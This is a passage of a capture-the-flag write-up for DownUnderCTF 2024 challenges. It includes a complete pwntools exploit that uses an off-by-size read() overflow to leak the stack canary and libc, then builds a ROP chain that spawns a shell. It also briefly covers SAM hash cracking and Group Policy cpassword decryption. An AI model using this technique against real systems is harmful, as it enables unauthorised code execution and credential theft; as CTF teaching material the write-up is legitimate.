true <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n      iVar1 <span class=\"token operator\">=</span> <span class=\"token function\">menu</span><span 
class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n      <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>iVar1 <span class=\"token operator\">!=</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">break</span><span class=\"token punctuation\">;</span>\n      <span class=\"token function\">read</span><span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span>name<span class=\"token punctuation\">,</span><span class=\"token number\">0x88</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>iVar1 <span class=\"token operator\">!=</span> <span class=\"token number\">2</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">break</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Hello, %s\\n\"</span><span class=\"token punctuation\">,</span>name<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>local_10 <span class=\"token operator\">!=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">long</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span>in_FS_OFFSET <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span 
class=\"token punctuation\">{</span>\n                    <span class=\"token comment\">/* WARNING: Subroutine does not return */</span>\n    <span class=\"token function\">__stack_chk_fail</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Inside the <code class=\"language-text\">main</code> function, the program uses the <code class=\"language-text\">menu</code> function either to accept input for <code class=\"language-text\">name</code> or to print the saved <code class=\"language-text\">name</code>.</p>\n<p>Here, the <code class=\"language-text\">name</code> buffer is only <code class=\"language-text\">name[88]</code>, but the size read by <code class=\"language-text\">read</code> is <code class=\"language-text\">0x88</code> (136).</p>\n<p>Because of that, when printing <code class=\"language-text\">name</code>, you can leak information from the stack by crafting the input so that the NULL byte gets overwritten.</p>\n<p>By abusing this vulnerability to leak the Canary and the base address of libc, you can execute a ROP chain and get a shell.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\n<span class=\"token comment\"># Set context</span>\n<span class=\"token comment\"># context.log_level = \"debug\"</span>\ncontext<span class=\"token punctuation\">.</span>arch <span class=\"token operator\">=</span> <span class=\"token string\">\"amd64\"</span>\ncontext<span class=\"token punctuation\">.</span>endian <span class=\"token 
operator\">=</span> <span class=\"token string\">\"little\"</span>\ncontext<span class=\"token punctuation\">.</span>word_size <span class=\"token operator\">=</span> <span class=\"token number\">64</span>\n\n<span class=\"token comment\"># Set gdb script</span>\ngdbscript <span class=\"token operator\">=</span> <span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"\nb *(main+142)\ncontinue\n\"\"\"</span></span>\n\n<span class=\"token comment\"># Set target</span>\nTARGET_PATH <span class=\"token operator\">=</span> <span class=\"token string\">\"./yawa\"</span>\nexe <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Run program</span>\nis_gdb <span class=\"token operator\">=</span> <span class=\"token boolean\">True</span>\nis_gdb <span class=\"token operator\">=</span> <span class=\"token boolean\">False</span>\n<span class=\"token keyword\">if</span> is_gdb<span class=\"token punctuation\">:</span>\n    target <span class=\"token operator\">=</span> gdb<span class=\"token punctuation\">.</span>debug<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">,</span> aslr<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">,</span> gdbscript<span class=\"token operator\">=</span>gdbscript<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span>\n    <span class=\"token comment\"># target = process(TARGET_PATH)</span>\n    target <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"2024.ductf.dev\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">30010</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Canary leak</span>\ntarget<span 
class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"> \"</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"1\"</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span><span class=\"token string\">b\"A\"</span><span class=\"token operator\">*</span><span class=\"token number\">88</span><span class=\"token punctuation\">)</span>\n\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"> \"</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"2\"</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"> \"</span><span class=\"token punctuation\">)</span>\nleaked_canary <span class=\"token operator\">=</span> r<span class=\"token punctuation\">[</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Hello, \"</span><span class=\"token punctuation\">)</span><span class=\"token operator\">+</span><span class=\"token number\">88</span><span class=\"token operator\">+</span><span class=\"token number\">1</span><span class=\"token punctuation\">:</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Hello, \"</span><span class=\"token punctuation\">)</span><span class=\"token 
operator\">+</span><span class=\"token number\">88</span><span class=\"token operator\">+</span><span class=\"token number\">1</span><span class=\"token operator\">+</span><span class=\"token number\">7</span><span class=\"token punctuation\">]</span>\nleaked_canary <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"0x\"</span> <span class=\"token operator\">+</span> <span class=\"token punctuation\">(</span>leaked_canary<span class=\"token punctuation\">[</span><span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span><span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token string\">\"00\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>leaked_canary<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># libc leak</span>\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"1\"</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span><span class=\"token string\">b\"A\"</span><span class=\"token 
operator\">*</span><span class=\"token number\">103</span><span class=\"token punctuation\">)</span>\n\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"> \"</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"2\"</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"> \"</span><span class=\"token punctuation\">)</span>\nlibc_start_main_ret <span class=\"token operator\">=</span> <span class=\"token string\">\"0x\"</span> <span class=\"token operator\">+</span> <span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">[</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Hello, \"</span><span class=\"token punctuation\">)</span><span class=\"token operator\">+</span><span class=\"token number\">103</span><span class=\"token operator\">+</span><span class=\"token number\">1</span><span class=\"token punctuation\">:</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Hello, \"</span><span class=\"token punctuation\">)</span><span class=\"token operator\">+</span><span class=\"token number\">103</span><span class=\"token operator\">+</span><span class=\"token number\">1</span><span class=\"token operator\">+</span><span class=\"token number\">6</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span><span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span><span class=\"token operator\">-</span><span class=\"token 
number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nlibc_start_main_ret <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>libc_start_main_ret<span class=\"token punctuation\">,</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>libc_start_main_ret<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Create payload(libc6_2.35-0ubuntu3.6_amd64)</span>\nlibc_base <span class=\"token operator\">=</span> libc_start_main_ret <span class=\"token operator\">-</span> <span class=\"token number\">0x29d90</span>\nlibc_system <span class=\"token operator\">=</span> libc_base <span class=\"token operator\">+</span> <span class=\"token number\">0x50d70</span>\nbinsh <span class=\"token operator\">=</span> libc_base <span class=\"token operator\">+</span> <span class=\"token number\">0x1d8678</span>\npop_rdi <span class=\"token operator\">=</span> libc_base <span class=\"token operator\">+</span> <span class=\"token number\">0x1bbea1</span>\nret <span class=\"token operator\">=</span> libc_base <span class=\"token operator\">+</span> <span class=\"token number\">0x1bc065</span>\n\n<span class=\"token comment\"># Exploit</span>\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"1\"</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> <span class=\"token 
string\">b\"\\x00\"</span><span class=\"token operator\">*</span><span class=\"token number\">88</span> <span class=\"token operator\">+</span> p64<span class=\"token punctuation\">(</span>leaked_canary<span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token string\">b\"B\"</span><span class=\"token operator\">*</span><span class=\"token number\">8</span> <span class=\"token operator\">+</span> p64<span class=\"token punctuation\">(</span>ret<span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> p64<span class=\"token punctuation\">(</span>pop_rdi<span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> p64<span class=\"token punctuation\">(</span>binsh<span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> p64<span class=\"token punctuation\">(</span>libc_system<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"> \"</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"3\"</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Finish exploit</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>clean<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>I was able to get the flag by running the solver above.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n  
    style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 731px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/d36c726d60ec854de64867059849868e/6e9ba/image-20240706210155860.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 55.41666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/d36c726d60ec854de64867059849868e/8ac56/image-20240706210155860.webp 240w,\n/static/d36c726d60ec854de64867059849868e/d3be9/image-20240706210155860.webp 480w,\n/static/d36c726d60ec854de64867059849868e/feeb6/image-20240706210155860.webp 731w\"\n              sizes=\"(max-width: 731px) 100vw, 731px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/d36c726d60ec854de64867059849868e/8ff5a/image-20240706210155860.png 240w,\n/static/d36c726d60ec854de64867059849868e/e85cb/image-20240706210155860.png 480w,\n/static/d36c726d60ec854de64867059849868e/6e9ba/image-20240706210155860.png 731w\"\n            sizes=\"(max-width: 731px) 100vw, 731px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/d36c726d60ec854de64867059849868e/6e9ba/image-20240706210155860.png\"\n            alt=\"image-20240706210155860\"\n            title=\"image-20240706210155860\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"babys-first-forensicsforensic\" style=\"position:relative;\"><a 
href=\"#babys-first-forensicsforensic\" aria-label=\"babys first forensicsforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Baby’s First Forensics(Forensic)</h2>\n<blockquote>\n<p>They’ve been trying to breach our infrastructure all morning! They’re trying to get more info on our covert kangaroos! We need your help, we’ve captured some traffic of them attacking us, can you tell us what tool they were using and its version?</p>\n<p>NOTE: Wrap your answer in the DUCTF{}, e.g. DUCTF{nmap_7.25}</p>\n</blockquote>\n<p>You can identify the attack tool just by looking at an arbitrary received packet in the packet capture.</p>\n<p><code class=\"language-text\">DUCTF{Nikto_2.1.6}</code> was the correct flag.</p>\n<h2 id=\"sam-i-amforensic\" style=\"position:relative;\"><a href=\"#sam-i-amforensic\" aria-label=\"sam i amforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>SAM I AM(Forensic)</h2>\n<blockquote>\n<p>The attacker managed to gain Domain Admin on our rebels Domain Controller! 
Looks like they managed to log on with an account using WMI and dumped some files.</p>\n<p>Can you reproduce how they got the Administrator’s Password with the artifacts provided?</p>\n<p>Place the Administrator Account’s Password in DUCTF{}, e.g. DUCTF{password123!}</p>\n</blockquote>\n<p>As the title suggests, this was a SAM hash cracking challenge.</p>\n<p>I dumped the hashes with impacket.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 901px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/6feec35a4b282078a98ad731485af706/0955e/image-20240707103615602.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 20.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAyElEQVQY01WP2RKCMAxFgRYfYEZWpSxF2dwAQf3/b7umVRh9uJPTTOckMRKRQKQCgmq8i7FP9sjzDFmWoihyZMSq53lbhFGIMAzg+R6CwAdjDIZh/CeiT2UpSSiQkkQSFzLXsmN1pBzQtg2quoKUBdQCSmiaphYuUW8tvN4ueL4emB8zhrFHP/TEE9UbpnnCeB8036cR58sJ3alF3dRoaEjbNZrVdY7jfDeMo/Uc13VhWRY45zqMWev0pW9vbDDOwG1i+8O/J78B9iFiMfOa6gsAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/6feec35a4b282078a98ad731485af706/8ac56/image-20240707103615602.webp 240w,\n/static/6feec35a4b282078a98ad731485af706/d3be9/image-20240707103615602.webp 480w,\n/static/6feec35a4b282078a98ad731485af706/2b666/image-20240707103615602.webp 901w\"\n              sizes=\"(max-width: 901px) 100vw, 901px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/6feec35a4b282078a98ad731485af706/8ff5a/image-20240707103615602.png 
240w,\n/static/6feec35a4b282078a98ad731485af706/e85cb/image-20240707103615602.png 480w,\n/static/6feec35a4b282078a98ad731485af706/0955e/image-20240707103615602.png 901w\"\n            sizes=\"(max-width: 901px) 100vw, 901px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/6feec35a4b282078a98ad731485af706/0955e/image-20240707103615602.png\"\n            alt=\"image-20240707103615602\"\n            title=\"image-20240707103615602\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>By cracking them with Hashcat, I identified <code class=\"language-text\">DUCTF{!checkerboard1}</code> as the flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 733px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/19e5146ec5b533c5ed3afe16a70f9290/00b70/image-20240707104045294.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 47.08333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/19e5146ec5b533c5ed3afe16a70f9290/8ac56/image-20240707104045294.webp 240w,\n/static/19e5146ec5b533c5ed3afe16a70f9290/d3be9/image-20240707104045294.webp 480w,\n/static/19e5146ec5b533c5ed3afe16a70f9290/cf734/image-20240707104045294.webp 733w\"\n              sizes=\"(max-width: 733px) 100vw, 733px\"\n              type=\"image/webp\"\n            />\n          <source\n            
srcset=\"/static/19e5146ec5b533c5ed3afe16a70f9290/8ff5a/image-20240707104045294.png 240w,\n/static/19e5146ec5b533c5ed3afe16a70f9290/e85cb/image-20240707104045294.png 480w,\n/static/19e5146ec5b533c5ed3afe16a70f9290/00b70/image-20240707104045294.png 733w\"\n            sizes=\"(max-width: 733px) 100vw, 733px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/19e5146ec5b533c5ed3afe16a70f9290/00b70/image-20240707104045294.png\"\n            alt=\"image-20240707104045294\"\n            title=\"image-20240707104045294\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"bad-policiesforensic\" style=\"position:relative;\"><a href=\"#bad-policiesforensic\" aria-label=\"bad policiesforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Bad Policies(Forensic)</h2>\n<blockquote>\n<p>Looks like the attacker managed to access the rebels Domain Controller.</p>\n<p>Can you figure out how they got access after pulling these artifacts from one of our Outpost machines?</p>\n</blockquote>\n<p>The challenge provides dumped Group Policy settings and similar artifacts.</p>\n<p>I used Registry.Pol Viewer and reviewed the <code class=\"language-text\">.pol</code> contents, but I couldn’t find anything suspicious.</p>\n<p>Reference: <a 
href=\"https://sdmsoftware.com/389932-gpo-freeware-downloads/registry-pol-viewer-utility/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Registry.Pol Viewer Utility - SDM Software</a></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 815px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/da83fb37e5467e8c6070569ee3d7031c/ef916/image-20240707104630760.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 40%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/da83fb37e5467e8c6070569ee3d7031c/8ac56/image-20240707104630760.webp 240w,\n/static/da83fb37e5467e8c6070569ee3d7031c/d3be9/image-20240707104630760.webp 480w,\n/static/da83fb37e5467e8c6070569ee3d7031c/0ea8f/image-20240707104630760.webp 815w\"\n              sizes=\"(max-width: 815px) 100vw, 815px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/da83fb37e5467e8c6070569ee3d7031c/8ff5a/image-20240707104630760.png 240w,\n/static/da83fb37e5467e8c6070569ee3d7031c/e85cb/image-20240707104630760.png 480w,\n/static/da83fb37e5467e8c6070569ee3d7031c/ef916/image-20240707104630760.png 815w\"\n            sizes=\"(max-width: 815px) 100vw, 815px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/da83fb37e5467e8c6070569ee3d7031c/ef916/image-20240707104630760.png\"\n            alt=\"image-20240707104630760\"\n            title=\"image-20240707104630760\"\n            loading=\"lazy\"\n            
style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>However, I noticed that <code class=\"language-text\">cpassword</code> was embedded in <code class=\"language-text\">Groups.xml</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/f143d56eee88b8ca99cbb48f4f76940a/9239a/image-20240707110942775.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 10.833333333333334%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAWUlEQVQI133LOw6AIBREUfYhRpj3ARpjpHD/KxsJUluc3GkmuBded6eaMwMUVUKEmNuInChDTgf3uA3xVwC+s5U21NVGr41nf1jd2EwGZVFMVWUqExahC/gCi2E4W371nIcAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/f143d56eee88b8ca99cbb48f4f76940a/8ac56/image-20240707110942775.webp 240w,\n/static/f143d56eee88b8ca99cbb48f4f76940a/d3be9/image-20240707110942775.webp 480w,\n/static/f143d56eee88b8ca99cbb48f4f76940a/e46b2/image-20240707110942775.webp 960w,\n/static/f143d56eee88b8ca99cbb48f4f76940a/0d9bd/image-20240707110942775.webp 1246w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/f143d56eee88b8ca99cbb48f4f76940a/8ff5a/image-20240707110942775.png 240w,\n/static/f143d56eee88b8ca99cbb48f4f76940a/e85cb/image-20240707110942775.png 480w,\n/static/f143d56eee88b8ca99cbb48f4f76940a/d9199/image-20240707110942775.png 
960w,\n/static/f143d56eee88b8ca99cbb48f4f76940a/9239a/image-20240707110942775.png 1246w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/f143d56eee88b8ca99cbb48f4f76940a/d9199/image-20240707110942775.png\"\n            alt=\"image-20240707110942775\"\n            title=\"image-20240707110942775\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>A publicly known vulnerability (MS14-025) allows <code class=\"language-text\">cpassword</code> to be decrypted.</p>\n<p>Reference: <a href=\"https://support.microsoft.com/ja-jp/topic/-ms14-025-%E3%82%B0%E3%83%AB%E3%83%BC%E3%83%97-%E3%83%9D%E3%83%AA%E3%82%B7%E3%83%BC%E5%9F%BA%E6%9C%AC%E8%A8%AD%E5%AE%9A%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%AB%E3%82%88%E3%82%8A-%E7%89%B9%E6%A8%A9%E3%81%8C%E6%98%87%E6%A0%BC%E3%81%95%E3%82%8C%E3%82%8B-2014-%E5%B9%B4-5-%E6%9C%88-13-%E6%97%A5-60734e15-af79-26ca-ea53-8cd617073c30\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">[MS14-025] A vulnerability in Group Policy Preferences could allow elevation of privilege (May 13, 2014) - Microsoft Support</a></p>\n<p>So I used the following tool to decrypt <code class=\"language-text\">cpassword</code> and recover the password, which gave me the correct flag.</p>\n<p>Reference: <a href=\"https://github.com/t0thkr1s/gpp-decrypt\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">GitHub - t0thkr1s/gpp-decrypt: Tool to parse the Group Policy Preferences XML file which extracts the username and decrypts the cpassword attribute.</a></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    
